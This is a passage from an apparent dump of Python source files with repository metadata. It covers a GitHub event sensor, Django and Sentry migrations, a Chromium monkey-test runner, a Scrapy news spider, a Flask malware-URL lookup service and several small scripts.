] | permissive | meirwah/st2contrib | 4470028cf467dfe33ccebe2ebb224c79edc6642e | 0743c96abc04ccda983303c4bdb744929dc17fd2 | refs/heads/master | 2021-01-22T02:13:20.290982 | 2015-08-30T11:39:03 | 2015-08-30T11:39:03 | 38,318,169 | 1 | 2 | null | 2015-06-30T15:45:15 | 2015-06-30T15:45:15 | null | UTF-8 | Python | false | false | 5,136 | py | import eventlet
from github import Github
from st2reactor.sensor.base import PollingSensor
eventlet.monkey_patch(
os=True,
select=True,
socket=True,
thread=True,
time=True)
DATE_FORMAT_STRING = '%Y-%m-%d %H:%M:%S'
class GithubRepositorySensor(PollingSensor):
EVENT_TYPE_WHITELIST = [
'IssuesEvent', # Triggered when an issue is assigned, unassigned, labeled, unlabeled,
# opened, closed, or reopened
'IssueCommentEvent', # Triggered when an issue comment is created
'ForkEvent', # Triggered when a user forks a repository,
'WatchEvent' # Triggered when a user stars a repository
]
def __init__(self, sensor_service, config=None, poll_interval=None):
super(GithubRepositorySensor, self).__init__(sensor_service=sensor_service,
config=config,
poll_interval=poll_interval)
self._trigger_ref = 'github.repository_event'
self._logger = self._sensor_service.get_logger(__name__)
self._client = None
self._repositories = []
self._last_event_ids = {}
def setup(self):
self._client = Github(self._config['token'])
for repository_dict in self._config['repository_sensor']['repositories']:
user = self._client.get_user(repository_dict['user'])
repository = user.get_repo(repository_dict['name'])
self._repositories.append((repository_dict['name'], repository))
def poll(self):
for repository_name, repository_obj in self._repositories:
self._logger.debug('Processing repository "%s"' %
(repository_name))
self._process_repository(name=repository_name,
repository=repository_obj)
def _process_repository(self, name, repository):
"""
Retrieve events for the provided repository and dispatch triggers for
new events.
:param name: Repository name.
:type name: ``str``
:param repository: Repository object.
:type repository: :class:`Repository`
"""
assert(isinstance(name, basestring))
count = self._config['repository_sensor']['count']
events = repository.get_events()[:count]
events = list(reversed(list(events)))
last_event_id = self._get_last_id(name=name)
for event in events:
if last_event_id and int(event.id) <= int(last_event_id):
# This event has already been processed
continue
self._handle_event(repository=name, event=event)
if events:
self._set_last_id(name=name, last_id=events[-1].id)
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _get_last_id(self, name):
"""
:param name: Repository name.
:type name: ``str``
"""
if not self._last_event_ids.get(name, None) and hasattr(self._sensor_service, 'get_value'):
key_name = 'last_id.%s' % (name)
self._last_event_ids[name] = self._sensor_service.get_value(name=key_name)
return self._last_event_ids.get(name, None)
def _set_last_id(self, name, last_id):
"""
:param name: Repository name.
:type name: ``str``
"""
self._last_event_ids[name] = last_id
if hasattr(self._sensor_service, 'set_value'):
key_name = 'last_id.%s' % (name)
self._sensor_service.set_value(name=key_name, value=last_id)
def _handle_event(self, repository, event):
if event.type not in self.EVENT_TYPE_WHITELIST:
self._logger.debug('Skipping ignored event (type=%s)' % (event.type))
return
self._dispatch_trigger_for_event(repository=repository, event=event)
def _dispatch_trigger_for_event(self, repository, event):
trigger = self._trigger_ref
created_at = event.created_at
if created_at:
created_at = created_at.strftime(DATE_FORMAT_STRING)
# Common attributes
payload = {
'repository': repository,
'id': event.id,
'created_at': created_at,
'type': event.type,
'actor': {
'id': event.actor.id,
'login': event.actor.login,
'name': event.actor.name,
'email': event.actor.email,
'loaction': event.actor.location,
'bio': event.actor.bio,
'url': event.actor.html_url
},
'payload': {}
}
event_specific_payload = self._get_payload_for_event(event=event)
payload['payload'] = event_specific_payload
self._sensor_service.dispatch(trigger=trigger, payload=payload)
def _get_payload_for_event(self, event):
payload = event.payload or {}
return payload
| [
"[email protected]"
] | |
0cb32b495378935ca0dc58cd114e1c9f37142914 | 0c14e45bd96dcbdd344e038705822ffce90aba4e | /application.py | 3bdd304a07cf828f4ba8632fc5a73c5751c60864 | [] | no_license | qiwsir/json-diff | 624b18833832edaab62180a1bdf0c10c19f9fefc | bb5ae3798fcf24c0e3d20ba7cb6bd63dce217620 | refs/heads/master | 2021-01-16T21:08:39.725121 | 2014-11-13T15:25:11 | 2014-11-13T15:25:11 | 26,757,081 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,526 | py | #! /usr/bin/env python
#coding:utf-8
from method import diffmethod
from dboption.mongodb import *
import json
import datetime
import time
import json_tools
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
def diff():
"""
find the difference between the two JSONs.
"""
gene_last = [ ele["_id"] for ele in lastdb.find({},{'_id':1}) ]
gene_new = [ ele["_id"] for ele in newdb.find({},{'_id':1}) ]
geneid = diffmethod.OptLst(gene_last, gene_new)
add_gene = geneid.addLst() #the list consisting of the IDs in the new collection different from the IDs in the old one
shared_gene = geneid.shareLst() #the list consisting of the IDs in the new collection same as the IDs in the old one
deleted_gene = geneid.deleLst() #the list consisting of the IDs in the old collection but not in the new collection
#insert the new values into the database.
if add_gene:
for i in add_gene:
one_gene = newdb.find_one({"_id":i})
db_change.insert({"gene_id":i,"changes":[{"stat":"new_gene","value":one_gene}],"lastdb":last_date,"newdb":new_date})
#store the deleted IDs
if deleted_gene:
for i in deleted_gene:
one_gene = lastdb.find_one({"_id":i})
db_change.insert({"gene_id":i,"changes":[{"stat":"delete"}],"lastdb":last_date,"newdb":new_date})
#store the records in which the values have been changed
if shared_gene:
diff_gene = [i for i in shared_gene if cmp(lastdb.find_one({"_id":i},{"_id":0}),newdb.find_one({"_id":i},{"_id":0}))] #the list of the IDs of the changed records
print "diff_gene_list:",len(diff_gene)
if diff_gene:
for i in diff_gene:
last_content = lastdb.find_one({"_id":i},{"_id":0})
new_content = newdb.find_one({"_id":i},{"_id":0})
diff = diffmethod.DiffJson(last_content, new_content)
diff_lst = diff.diffDict()
changes_value = diff.changesValue(diff_lst)
db_change.insert({"gene_id":i, "changes":changes_value, "lastdb":last_date, "newdb":new_date })
def main():
print ">>>Hi, I am Qiwei. Welcome to my website: www.itdiffer.com<<<"
print "I am working like a horse. You may have a rest and I will send you the result after a while."
diff()
print "ok."
if __name__=="__main__":
start = time.clock()
main()
print "The time I have spent is:"
print (time.clock() - start)
| [
"[email protected]"
] | |
22cce749bf9d8f333797bf9494f8885489e03119 | fa89836a6759151896a07650747462b8cda40610 | /mse/mapdata/migrations/0008_auto_20180223_2200.py | b0b78b056bec3467aec86819cb31761fc5f1df5d | [] | no_license | DigitalGizmo/mse21 | 334813bfebec9b78f0541744e54f218f9cc6936b | 89f1c0f9c05cefaaa8c703732ee4e4642aecd3c9 | refs/heads/master | 2023-07-09T13:29:13.903900 | 2018-03-26T19:26:09 | 2018-03-26T19:26:09 | 126,878,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-02-24 03:00
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mapdata', '0007_auto_20180223_2119'),
]
operations = [
migrations.AlterField(
model_name='voyage',
name='lat_sec',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='voyage',
name='lon_sec',
field=models.FloatField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
c51f89c655b8803a2b1d658b3ed1d38be188103a | 67f988dedfd8ae049d982d1a8213bb83233d90de | /external/chromium/build/android/run_monkey_test.py | 433b2bdd5f81c748e3497f34f25e25487ffdb2b1 | [
"BSD-3-Clause"
] | permissive | opensourceyouthprogramming/h5vcc | 94a668a9384cc3096a365396b5e4d1d3e02aacc4 | d55d074539ba4555e69e9b9a41e5deb9b9d26c5b | refs/heads/master | 2020-04-20T04:57:47.419922 | 2019-02-12T00:56:14 | 2019-02-12T00:56:14 | 168,643,719 | 1 | 1 | null | 2019-02-12T00:49:49 | 2019-02-01T04:47:32 | C++ | UTF-8 | Python | false | false | 5,697 | py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs the Monkey tests on one or more devices."""
import logging
import optparse
import random
import sys
import time
from pylib import android_commands
from pylib import python_test_base
from pylib import python_test_sharder
from pylib import test_options_parser
from pylib import test_result
class MonkeyTest(python_test_base.PythonTestBase):
def testMonkey(self):
start_ms = int(time.time()) * 1000
# Launch and wait for Chrome to launch.
self.adb.StartActivity(self.options.package_name,
self.options.activity_name,
wait_for_completion=True,
action='android.intent.action.MAIN',
force_stop=True)
# Chrome crashes are not always caught by Monkey test runner.
# Verify Chrome has the same PID before and after the test.
before_pids = self.adb.ExtractPid(self.options.package_name)
# Run the test.
output = ''
duration_ms = 0
if before_pids:
output = '\n'.join(self._LaunchMonkeyTest())
duration_ms = int(time.time()) * 1000 - start_ms
after_pids = self.adb.ExtractPid(self.options.package_name)
crashed = (not before_pids or not after_pids
or after_pids[0] != before_pids[0])
result = test_result.SingleTestResult(self.qualified_name, start_ms,
duration_ms, log=output)
results = test_result.TestResults()
if 'Monkey finished' in output and not crashed:
results.ok = [result]
else:
results.crashed = [result]
return results
def _LaunchMonkeyTest(self):
"""Runs monkey test for a given package.
Looks at the following parameters in the options object provided
in class initializer:
package_name: Allowed package.
category: A list of allowed categories.
throttle: Delay between events (ms).
seed: Seed value for pseduo-random generator. Same seed value
generates the same sequence of events. Seed is randomized by
default.
event_count: Number of events to generate.
verbosity: Verbosity level [0-3].
extra_args: A string of other args to pass to the command verbatim.
"""
category = self.options.category or []
seed = self.options.seed or random.randint(1, 100)
throttle = self.options.throttle or 100
event_count = self.options.event_count or 10000
verbosity = self.options.verbosity or 1
extra_args = self.options.extra_args or ''
timeout_ms = event_count * throttle * 1.5
cmd = ['monkey',
'-p %s' % self.options.package_name,
' '.join(['-c %s' % c for c in category]),
'--throttle %d' % throttle,
'-s %d' % seed,
'-v ' * verbosity,
'--monitor-native-crashes',
'--kill-process-after-error',
extra_args,
'%d' % event_count]
return self.adb.RunShellCommand(' '.join(cmd), timeout_time=timeout_ms)
def DispatchPythonTests(options):
"""Dispatches the Monkey tests, sharding it if there multiple devices."""
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
available_tests = [MonkeyTest('testMonkey')]
attached_devices = android_commands.GetAttachedDevices()
if not attached_devices:
raise Exception('You have no devices attached or visible!')
# Actually run the tests.
logging.debug('Running monkey tests.')
available_tests *= len(attached_devices)
options.ensure_value('shard_retries', 1)
sharder = python_test_sharder.PythonTestSharder(
attached_devices, available_tests, options)
result = sharder.RunShardedTests()
result.LogFull('Monkey', 'Monkey', options.build_type, available_tests)
result.PrintAnnotation()
def main():
desc = 'Run the Monkey tests on 1 or more devices.'
parser = optparse.OptionParser(description=desc)
test_options_parser.AddBuildTypeOption(parser)
parser.add_option('--package-name', help='Allowed package.')
parser.add_option('--activity-name',
default='com.google.android.apps.chrome.Main',
help='Name of the activity to start [default: %default].')
parser.add_option('--category',
help='A list of allowed categories [default: ""].')
parser.add_option('--throttle', default=100, type='int',
help='Delay between events (ms) [default: %default]. ')
parser.add_option('--seed', type='int',
help=('Seed value for pseduo-random generator. Same seed '
'value generates the same sequence of events. Seed '
'is randomized by default.'))
parser.add_option('--event-count', default=10000, type='int',
help='Number of events to generate [default: %default].')
parser.add_option('--verbosity', default=1, type='int',
help='Verbosity level [0-3] [default: %default].')
parser.add_option('--extra-args', default='',
help=('String of other args to pass to the command verbatim'
' [default: "%default"].'))
(options, args) = parser.parse_args()
if args:
parser.print_help(sys.stderr)
parser.error('Unknown arguments: %s' % args)
if not options.package_name:
parser.print_help(sys.stderr)
parser.error('Missing package name')
if options.category:
options.category = options.category.split(',')
DispatchPythonTests(options)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
d77e14f58ee39af8660b99b10fb1fe3800ec8f01 | 1d7a40fde9c4da1cdb70f7e641a7dd65a8eba1a8 | /scripts/data/__init__.py | bfae36d4a18366f86026d2c4834e343a27d94655 | [
"BSD-3-Clause"
] | permissive | dezede/dezede | 675c5f6c05beffa5ad855ab521c19c077a188039 | f50d2d478b473ac2acce1c5f6f9748c6211d593c | refs/heads/master | 2023-08-25T13:26:47.939378 | 2023-08-14T20:24:51 | 2023-08-14T20:25:02 | 9,086,660 | 18 | 6 | BSD-3-Clause | 2023-06-05T16:32:57 | 2013-03-28T21:22:39 | Python | UTF-8 | Python | false | false | 20 | py |
data_modules = [
]
| [
"[email protected]"
] | |
fd6ab081d187f04abb302d2404e52c16f876fa11 | 048cda95057e9852b7f1cebbab864ea10e3fc0db | /crawler/v1/yehey.py | d8db31fceb0c5421bbcdb9b8fa70b42b9a447127 | [] | no_license | AMAtreus/dg_crawler_website | fa9e587cf07549c0752bb88a8f61b1057496da26 | 1bcb03a48aff1ebca4e04a5c060be299ca9881d4 | refs/heads/master | 2023-08-17T09:56:51.379743 | 2021-10-13T13:50:23 | 2021-10-13T13:50:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,540 | py | from crawler.spiders import BaseSpider
import requests
# 此文件包含的头文件不要修改
import scrapy
from utils.util_old import *
from crawler.items import *
from bs4 import BeautifulSoup
from scrapy.http import Request, Response
import re
import time
import json
class yehey(BaseSpider):# cyl
name = 'yehey'
# allowed_domains = ['https://yehey.com/']
start_urls = ['https://yehey.com/']
website_id = 1225 # 网站的id(必填)
language_id = 1866 # 所用语言的id
sql = { # sql配置
'host': '192.168.235.162',
'user': 'dg_admin',
'password': 'dg_admin',
'db': 'dg_crawler'
}
def parse(self, response):
meta = {}
meta['category2'] = ''
meta['url_cat'] = ''
meta['page_number'] = ''
html = BeautifulSoup(response.text, "html.parser")
cat1 = html.select_one("li#menu-item-5581 a").text
meta['category1'] = cat1 # 获取一级目录
cat1_url = html.select_one("li#menu-item-5581 a")['href']
yield scrapy.Request(cat1_url, meta=meta, callback=self.parse_category2)
def parse_category2(self, response):
html = BeautifulSoup(response.text, "html.parser")
cat2s = html.select("li#menu-item-5581>ul.sub-menu>li")
for c in cat2s:
cat2_url = c.select_one("a")['href']
cat2 = c.select_one("a").text
response.meta['category2'] = cat2 # 获取二级目录
yield scrapy.Request(cat2_url, meta=response.meta, callback=self.parse_category3)
def parse_category3(self, response):
html = BeautifulSoup(response.text, "html.parser")
detail_list = html.select("main#main>article")
for d in detail_list:
detail_url = d.select_one("h2.entry-title.th-text-md.th-mb-0 a")['href'] # 获取静态加载的url
yield scrapy.Request(detail_url, meta=response.meta, callback=self.parse_detail) # 处理静态的数据
url = response.url
ex2 = '.*?category/(.*?)/'
url_cat = re.findall(ex2, url, re.S)[0]
response.meta['url_cat'] = url_cat
page_number = 3
response.meta['page_number'] = page_number
request_url = 'https://yehey.com/?infinity=scrolling'
page_text = response.text
ex = '<script type="text/javascript">.*?currentday%22%3A%22(.*?)%22%2C%22'
currentday = re.findall(ex, page_text, re.S)[0]
data = {
'page': '2',
'currentday': currentday,
'query_args[category_name]': url_cat
}
yield scrapy.FormRequest.from_response(response, url=request_url, formdata=data, method='POST',
meta=response.meta, callback=self.parse_category4)
def parse_category4(self, response):
request_url = 'https://yehey.com/?infinity=scrolling'
url_cat = response.meta['url_cat']
page_number = response.meta['page_number']
dic = {'type': 'empty'}
if json.loads(response.body) == dic:
pass
else:
if 'currentday' in json.loads(response.body).keys():
currentday = json.loads(response.body)['currentday']
data = {
'page': str(page_number),
'currentday': currentday,
'query_args[category_name]': url_cat
}
if 'postflair' in json.loads(response.body).keys():
details = json.loads(response.body)['postflair'].keys()
for i in details:
yield scrapy.Request(i, meta=response.meta, callback=self.parse_detail)
if 'html' in json.loads(response.body).keys():
html = json.loads(response.body)['html']
html = BeautifulSoup(html, "html.parser")
ddl = html.select("article time")[0]['datetime']
ddl = re.split('T|\+', ddl) # ['2021-01-30', '23:00:00', '08:00']
ddl = ddl[0] + ' ' + ddl[1] # 2021-01-30 23:00:00
ddl = Util.format_time3(ddl)
else:
ddl = None
if (self.time == None or ddl >= int(self.time)):
response.meta['page_number'] = response.meta['page_number'] + 1
yield scrapy.FormRequest(url=request_url, formdata=data, method='POST',
meta=response.meta, callback=self.parse_category4)
else:
self.logger.info('时间截止')
pass
def parse_detail(self,response):
item = NewsItem()
html = BeautifulSoup(response.text, 'html.parser')
item['category1'] = response.meta['category1']
item['category2'] = response.meta['category2']
if html.find('h1', class_='entry-title th-mb-0 sm:th-text-8xl th-text-4xl').text.strip(): # 获取标题
item['title'] = html.find('h1', class_='entry-title th-mb-0 sm:th-text-8xl th-text-4xl').text.strip()
item['body'] = '' # 获取正文内容
if html.select("div.entry-content.th-content p"):
bodies = html.select("div.entry-content.th-content p")
item['abstract'] = bodies[0].text # 获取摘要
# for b in bodies:
# item['body'] += b.text.strip()
# item['body'] += "\n"
b_list = [b.text.strip() for b in bodies]
item['body'] = '\n'.join(b_list)
item['images'] = [] # 获取图片链接
if html.select_one("header#primary-header img") is not None: # 获取单独在标题的图片
image_one = html.select_one("header#primary-header img")['src']
item['images'].append(image_one)
if html.select("div.entry-content.th-content a>img"): # 获取在段落中的图片
imgaes = html.select("div.entry-content.th-content a>img")
for i in imgaes:
item['images'].append(i['src'])
if html.select_one("time.entry-date.published") is not None: # 获取发布时间
pub = html.select_one("time.entry-date.published")['datetime']
pub_time = re.split('T|\+', pub) # datetime="2021-01-30T23:00:00+08:00"
pubtime = pub_time[0] + ' ' + pub_time[1] # ['2021-01-30', '23:00:00', '08:00']
item['pub_time'] = pubtime # 2021-01-30 23:00:00
yield item | [
"[email protected]"
] | |
71b991b29176ceeb40dd18fb108913132eac9b9c | de3b77cb0927f28cbd85e9142c2dfd7c8be7c27e | /tests/migrations/028_log_mod_onboarding_msgs_up.py | 2d6e3dc23a0f321e5d54cd071e2830380b16a154 | [
"MIT"
] | permissive | LoansBot/database | f3dcbccde59fdb80c876d2612f250662946588e6 | eeaed26c2dcfdf0f9637b47ebe15cd1e000d8cc4 | refs/heads/master | 2021-07-02T22:07:18.683278 | 2021-06-02T04:09:38 | 2021-06-02T04:09:38 | 239,400,935 | 0 | 1 | MIT | 2021-06-02T04:14:31 | 2020-02-10T01:06:53 | Python | UTF-8 | Python | false | false | 850 | py | import unittest
import helper
class UpTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.connection = helper.setup_connection()
cls.cursor = cls.connection.cursor()
@classmethod
def tearDownClass(cls):
cls.cursor.close()
cls.connection.rollback()
helper.teardown_connection(cls.connection)
def tearDown(self):
self.connection.rollback()
def test_mod_onboarding_msg_history_exists(self):
self.assertTrue(
helper.check_if_table_exist(self.cursor, 'mod_onboarding_msg_history')
)
def test_mod_onboarding_msg_history_has_pkey(self):
self.assertTrue(
helper.check_if_pkey_exists(self.cursor, 'mod_onboarding_msg_history')
)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
61459c90cd48b2ee3302ca8357924844cce4aef0 | 7fc26de436ad958fc02e11fc7f7486f9ac775d0b | /services/url_lookup/project/api/url.py | 533675f407a56387237c088a49ac2be9f518316b | [] | no_license | chenjienan/url_lookup_service | 633071d78598b2ee248b6a6fc3ceee2bf4ccca9b | ef10d58450af97221697ac0fa26cfb9e5a43415e | refs/heads/master | 2023-05-12T00:09:36.278356 | 2019-08-06T16:45:05 | 2019-08-06T16:45:05 | 199,910,038 | 0 | 0 | null | 2023-05-01T21:14:08 | 2019-07-31T18:36:20 | Python | UTF-8 | Python | false | false | 2,698 | py | from flask import Blueprint, request, jsonify
from flask_restful import Resource, Api
from sqlalchemy import exc
from project import db
from project.api.models import Url
from urllib.parse import unquote
import tldextract
url_blueprint = Blueprint('url', __name__)
api = Api(url_blueprint)
class UrlList(Resource):
def get(self):
""" Get all urls """
response_obj = {
'status': 'success',
'data': {
'urls': [url.to_json() for url in Url.query.all()]
}
}
return response_obj, 200
def post(self):
""" add url to the system """
post_data = request.get_json()
response_object = {
'status': 'fail',
'message': 'Invalid payload.'
}
if not post_data:
return response_object, 400
url = post_data.get('url')
try:
get_url = Url.query.filter_by(url=url).first()
if not get_url:
db.session.add(Url(url=url))
db.session.commit()
response_object['status'] = 'success'
response_object['message'] = f'{url} was added!'
return response_object, 201
else:
response_object['message'] = 'That url already exists.'
return response_object, 400
except exc.IntegrityError:
db.session.rollback()
return response_object, 400
class UrlInfo(Resource):
def get(self, input_url=None):
""" Get url details """
url = unquote(input_url)
# post-process for domain/host extraction
ext = tldextract.extract(url)
host = '.'.join(part for part in ext if part)
response_obj = {
'status': 'fail',
'url': input_url,
'host': host,
'isMalware': None
}
try:
cur_url = Url.query.filter_by(url=host).first()
response_obj['status'] = 'success'
if not cur_url:
response_obj['isMalware'] = 'false'
return response_obj, 200
elif cur_url and not cur_url.active:
response_obj['isMalware'] = 'false'
return response_obj, 200
response_obj['isMalware'] = 'true'
return response_obj, 200
except ValueError:
return response_obj, 404
class UrlPing(Resource):
def get(self):
return {
'status': 'success',
'message': 'pong!'
}
api.add_resource(UrlPing, '/ping')
api.add_resource(UrlList, '/urls')
api.add_resource(UrlInfo, '/urlinfo/<path:input_url>')
| [
"[email protected]"
] | |
079e09457902766095c8d29b7e0de221c64610d5 | 48661992ea5d378437aa245bc2469d9677678fbc | /changecsv.py | d358fb5cd0d7309fed5ab796bf09c38300e23a08 | [] | no_license | sakurasakura1996/kaggle | a4f259ff0a89395d0801cfcd1215d2794598dcce | d159ccaebcc4fcd3013f746d6f280b4914ad9945 | refs/heads/master | 2020-09-11T22:51:34.604108 | 2019-12-08T06:51:45 | 2019-12-08T06:51:45 | 222,216,787 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | # 修改一下sub.csv的输出 输出序号从1开始,然后label是整数
import csv
import numpy as np
train_data = []
openfile = open('./sub.csv', 'r')
read = csv.reader(openfile)
for line in read:
train_data.append(line)
# print(line)
train_data = np.array(train_data) | [
"[email protected]"
] | |
7acf6789b67228e00bf1be4e74c42b43dcefa3e8 | a9a10382236404d65cd7909adf12bf41b6a59085 | /django_and_full_stack/multi_madlib/web_madlib/web_madlib/views.py | de5b1f7511c5e47a2d346ade9d3fcb4dd9a746ed | [] | no_license | shedwyn/codeguild | 9718038613d082b3a21f2b4ba56cf6cbb282606a | db792b1a13b32d6b135398b21f6a5124a75c639b | refs/heads/master | 2020-04-06T14:36:03.617029 | 2016-09-20T19:48:38 | 2016-09-20T19:48:38 | 55,080,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,006 | py | """
Python Coding Bootcamp (pdxcodeguild)
Code File for web_madlib/views.py
by: Erin Fough and Matthew James K on 5/9/2016
"""
from django.http import HttpResponse
def get_httpresponse_to_request(request=[], sentence=''):
"""
This function accepts the sentence for each numbered request, and the request object, and gives back the HttpResponse
:param 1: request is the [] Array of the current incommng http request post parameters from the client
:param 2: sentence is the main body of the madlib string as a String
:returns: the HttpResponse for each of the ^1 url incomming requests.
"""
response_positive = "200 OK"
response_negative = "400 BAD REQUEST "
if request[0] is None or request[0] is '':
response = HttpResponse(status = 400)
response.write(response_negative + 'noun1 was not provided or blank')
return response
elif request[1] is None or request[1] is '':
response = HttpResponse(status = 400)
response.write(response_negative + 'noun2 was not provided or blank')
return response
elif request[2] is None or request[2] is '':
response = HttpResponse(status = 400)
response.write(response_negative + 'noun3 was not provided or blank')
return response
else:
response = HttpResponse(status = 200)
response.write(response_positive + ' ' + sentence)
return response
def render_madlib_1(request):
post_parameters = []
post_parameters.append(request.GET['noun1'] if 'noun1' in request.GET else None) #The key value must be accessible
post_parameters.append(request.GET['noun2'] if 'noun2' in request.GET else None) #If the in expression does not work, use request.GET.get() then check for None
post_parameters.append(request.GET['noun3'] if 'noun3' in request.GET else None)
sentence = "{} hugged {} but not {}".format(post_parameters[0], post_parameters[1], post_parameters[2])
return get_httpresponse_to_request(post_parameters, sentence)
def render_madlib_2(request):
post_parameters = []
post_parameters.append(request.GET['noun1'] if 'noun1' in request.GET else None)
post_parameters.append(request.GET['noun2'] if 'noun2' in request.GET else None)
post_parameters.append(request.GET['noun3'] if 'noun3' in request.GET else None)
sentence = "{} troubled {} but not {}".format(post_parameters[0], post_parameters[1], post_parameters[2])
return get_httpresponse_to_request(post_parameters, sentence)
def render_madlib_3(request):
post_parameters = []
post_parameters.append(request.GET['noun1'] if 'noun1' in request.GET else None)
post_parameters.append(request.GET['noun2'] if 'noun2' in request.GET else None)
post_parameters.append(request.GET['noun3'] if 'noun3' in request.GET else None)
sentence = "{} ran for {} but not {}".format(post_parameters[0], post_parameters[1], post_parameters[2])
return get_httpresponse_to_request(post_parameters, sentence)
| [
"[email protected]"
] | |
5ef24cba12de0d3932574c98055682b47fb59215 | faca44e8424959ecd04098ccf936e6f5f80c8465 | /lessons/103-datetime.py | d4e481bf984cf1eaf889fa304cda67ee528e858a | [] | no_license | craymaru/python_practice | 01b0153631d83b2566e31a54346110f632412703 | 7616cbb945f432aa80d43408631b59afb90bf0f5 | refs/heads/master | 2021-05-20T10:12:07.245941 | 2020-05-19T14:33:14 | 2020-05-19T14:33:14 | 252,242,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | import datetime
print("datetime:")
now = datetime.datetime.now()
print(now)
print(now.isoformat())
print(now.strftime("%d/%m/%y-%H%M%S%f"))
today = datetime.date.today()
print(today)
print(today.isoformat())
print(today.strftime("%d/%m/%y"))
t = datetime.time(hour=1, minute=10, second=5, microsecond=100)
print(t)
print(t.isoformat())
print(t.strftime("%H_%M_%S_%f"))
print(now)
# d = datetime.timedelta(weeks=1)
d = datetime.timedelta(days=365)
# d = datetime.timedelta(hours=1)
# d = datetime.timedelta(minutes=1)
# d = datetime.timedelta(second=1)
# d = datetime.timedelta(microseconds=1)
print(now - d)
import time
print("time:")
time.sleep(1)
print(time.time())
import os
import shutil
file_name = "test.txt"
if os.path.exists(file_name):
shutil.copy(file_name, "{}.{}".format(
file_name, now.strftime("%Y_%m_%d_%H_%M_%S")
))
with open(file_name, "w") as f:
f.write("test") | [
"[email protected]"
] | |
3f0729620abccdeb6d4a9f3848fc18bcc0de6521 | 0103046cd77e9f86ccde477736de36bba766ceb6 | /src/sentry/migrations/0143_add_alerts_integrationfeature.py | 8ebf10baaca631b26cd1f6b68dae5ac7c842b3e8 | [
"BUSL-1.1",
"Apache-2.0"
] | permissive | kaozdl/sentry | ad41ada649a20300e9f2fe69050200cfbf738a63 | 63d698f5294f64a8c206b4c741e2a11be1f9a9be | refs/heads/master | 2021-06-21T18:24:21.713064 | 2021-03-04T19:45:20 | 2021-03-04T19:45:20 | 198,681,569 | 0 | 0 | BSD-3-Clause | 2019-07-24T17:32:29 | 2019-07-24T17:32:28 | null | UTF-8 | Python | false | false | 2,008 | py | # Generated by Django 1.11.29 on 2020-12-10 23:55
from django.db import migrations
import sentry.db.models.fields.bounded
class Migration(migrations.Migration):
# This flag is used to mark that a migration shouldn't be automatically run in
# production. We set this to True for operations that we think are risky and want
# someone from ops to run manually and monitor.
# General advice is that if in doubt, mark your migration as `is_dangerous`.
# Some things you should always mark as dangerous:
# - Large data migrations. Typically we want these to be run manually by ops so that
# they can be monitored. Since data migrations will now hold a transaction open
# this is even more important.
# - Adding columns to highly active tables, even ones that are NULL.
is_dangerous = False
# This flag is used to decide whether to run this migration in a transaction or not.
# By default we prefer to run in a transaction, but for migrations where you want
# to `CREATE INDEX CONCURRENTLY` this needs to be set to False. Typically you'll
# want to create an index concurrently when adding one to an existing table.
atomic = True
dependencies = [
("sentry", "0142_add_dashboard_tombstone"),
]
operations = [
migrations.AlterField(
model_name="integrationfeature",
name="feature",
field=sentry.db.models.fields.bounded.BoundedPositiveIntegerField(
choices=[
(0, "integrations-api"),
(1, "integrations-issue-link"),
(2, "integrations-stacktrace-link"),
(3, "integrations-event-hooks"),
(4, "integrations-project-management"),
(5, "integrations-incident-management"),
(6, "integrations-feature-flag"),
(7, "integrations-alerts"),
],
default=0,
),
),
]
| [
"[email protected]"
] | |
72bd965eb35957d66906599b19f40556c0cd940b | 06e34e2dface0b87fa785cab7e65422a5f20ba18 | /Solutions/1822.Sign of the Product of an Array/python.py | efc08c79677082b17cc8158628db075c809fd996 | [] | no_license | JerryHu1994/LeetCode-Practice | c9841b0ce70451c19c8a429a3898c05b6233e1d4 | b0ce69985c51a9a794397cd98a996fca0e91d7d1 | refs/heads/master | 2022-02-10T04:42:28.033364 | 2022-01-02T04:44:22 | 2022-01-02T04:44:22 | 117,118,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | class Solution:
def arraySign(self, nums: List[int]) -> int:
ans = 1
for n in nums:
if n < 0:
ans *= -1
elif n == 0:
return 0
return ans | [
"[email protected]"
] | |
bba941cbd7a031aba596f35b0cd5f58040fc39ac | 9d35f59c102236581e010e24ae39dd4a1c876aca | /fbauth/managers.py | f818d969d504b5fb08a0ddfbddc0c210e9ea6709 | [
"MIT"
] | permissive | Tuss4/django-fb-oauth | 195d30f19b7fa3b43cf1b337c2178fffb1c4a7ef | 9098ab3ea77e7695affd5c793c35d05ae61b1cdb | refs/heads/master | 2021-07-17T17:30:09.435330 | 2016-02-07T08:02:45 | 2016-02-07T08:02:45 | 51,091,583 | 2 | 0 | MIT | 2021-06-10T18:27:59 | 2016-02-04T17:10:42 | Python | UTF-8 | Python | false | false | 408 | py | from django.db import models
from django.contrib.auth import get_user_model
class FBManager(models.Manager):
"""Manager method to create a Facebook User"""
def create_fb_user(self, fb_id, token, **kwargs):
user = get_user_model().objects.create_user(**kwargs)
fbt = self.model(user=user, facebook_id=fb_id, access_token=token)
fbt.save(using=self._db)
return user
| [
"[email protected]"
] | |
